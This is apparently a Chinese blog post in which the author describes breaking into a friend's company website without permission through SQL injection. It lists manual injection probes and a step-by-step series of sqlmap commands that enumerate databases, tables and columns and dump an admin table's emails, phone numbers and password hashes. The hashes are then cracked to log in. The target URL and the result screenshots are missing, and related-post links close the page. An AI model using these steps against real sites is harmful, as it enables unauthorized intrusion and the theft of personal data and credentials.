SQL注入我是如何一步步攻破一家網際網路公司的

最近在研究web安全相關的知識，特別是sql注入類的相關知識。接觸了一些與sql注入相關的工具。週末在家閒著無聊，想把平時學的東東結合起來攻擊一下身邊某個小夥伴去的公司，看看能不能得逞。不試不知道，一試還真tm得逞了，內心有些小激動，特在此寫博文一篇，來記錄下我是如何一步步攻破這家網際網路公司的。

【作案工具介紹】

(2) sqlmap滲透測試工具

sqlmap是乙個自動化的sql注入工具，其主要功能是掃瞄，發現並利用給定的url的sql注入漏洞。

【作案細節如下】

原**』出錯或顯示不正常

and 1=1 出錯或顯示不正常

and 1=2 出錯或顯示不正常

如果有出錯，說明存在注入點。

在判斷完該鏈結存在注入點後，接下來就啟動我們的滲透測試工具sqlmap，進行下一步的注入工作，詳細過程如下：

1) 再次確認目標注入點是否可用：

python sqlmap.py -u

引數：-u：指定注入點url

結果：

注入結果展示：

a. 引數id存在基於布林的盲注，即可以根據返回頁面判斷條件真假的注入。

b. 引數id存在基於時間的盲注，即不能根據頁面返回內容判斷任何資訊，用條件語句檢視時間延遲語句是否執行(即頁面返回時間是否增加)來判斷。

c. 資料庫型別為：mysql 5.0.12

2) 暴庫所有資料庫：

一條命令即可曝出該sqlserver中所有資料庫名稱，命令如下：

python sqlmap.py -u --dbs

引數：

--dbs：dbs前面有兩條槓，列出所有資料庫。

結果：

結果顯示該sqlserver中共包含3個可用的資料庫。

3) 獲取當前使用的資料庫

python sqlmap.py -u --current-db

引數：

--current-db：當前所使用的資料庫。

結果：

4) 獲取當前資料庫使用賬戶

5) 列出sqlserver所有使用者

6) 獲取當前使用者資料庫賬戶與密碼

結果顯示該使用者可能無讀取相關系統的許可權。

7) 列出資料庫中的表

python sqlmap.py -u -d ***_store --tables

引數：

-d：指定資料庫名稱

--tables：列出表

結果：

結果顯示共列出了69張表。

8) 列出表中字段

python sqlmap.py -u -d ***_store -t mall_admin --columns

引數：

-d：指定資料庫名稱

-t：指定要列出欄位的表

--columns：指定列出字段

結果：

9)暴欄位內容

python sqlmap.py -u -d ***_store -t mall_admin -c "ag_id,email,id,mobile,name,password,status" --dump

引數：

-c ：指定要暴的字段

--dump：將結果匯出

如果字段內容太多，需要花費很多時間。可以指定匯出特定範圍的字段內容，命令如下：

python sqlmap.py -u -d ***_store -t mall_admin -c "ag_id,email,id,mobile,name,password,status" --start 1 --stop 10 --dump

引數：

--start：指定開始的行

--stop：指定結束的行

此條命令的含義為：匯出資料庫***_store中的表mall_admin中的關於字段(ag_id,email,id,mobile,name,password,status)中的第1到第10行的資料內容。

結果如下：

通過上圖，我們可以看到admin表中的使用者資訊了。我們將password欄位通過md5解密，可以得到hash的原文密碼，通過使用者名稱和密碼，我們就可以登入該**了。

SQL注入我是如何一步步攻破一家網際網路公司的

差距我是如何一步步落後於別人

我是如何一步步被Asch征服的

一步步學ROS

SQL注入 我是如何一步步攻破一家網際網路公司的

差距 我是如何一步步落後於別人

我是如何一步步被Asch征服的

一步步學ROS

相關推薦

SQL注入我是如何一步步攻破一家網際網路公司的

差距我是如何一步步落後於別人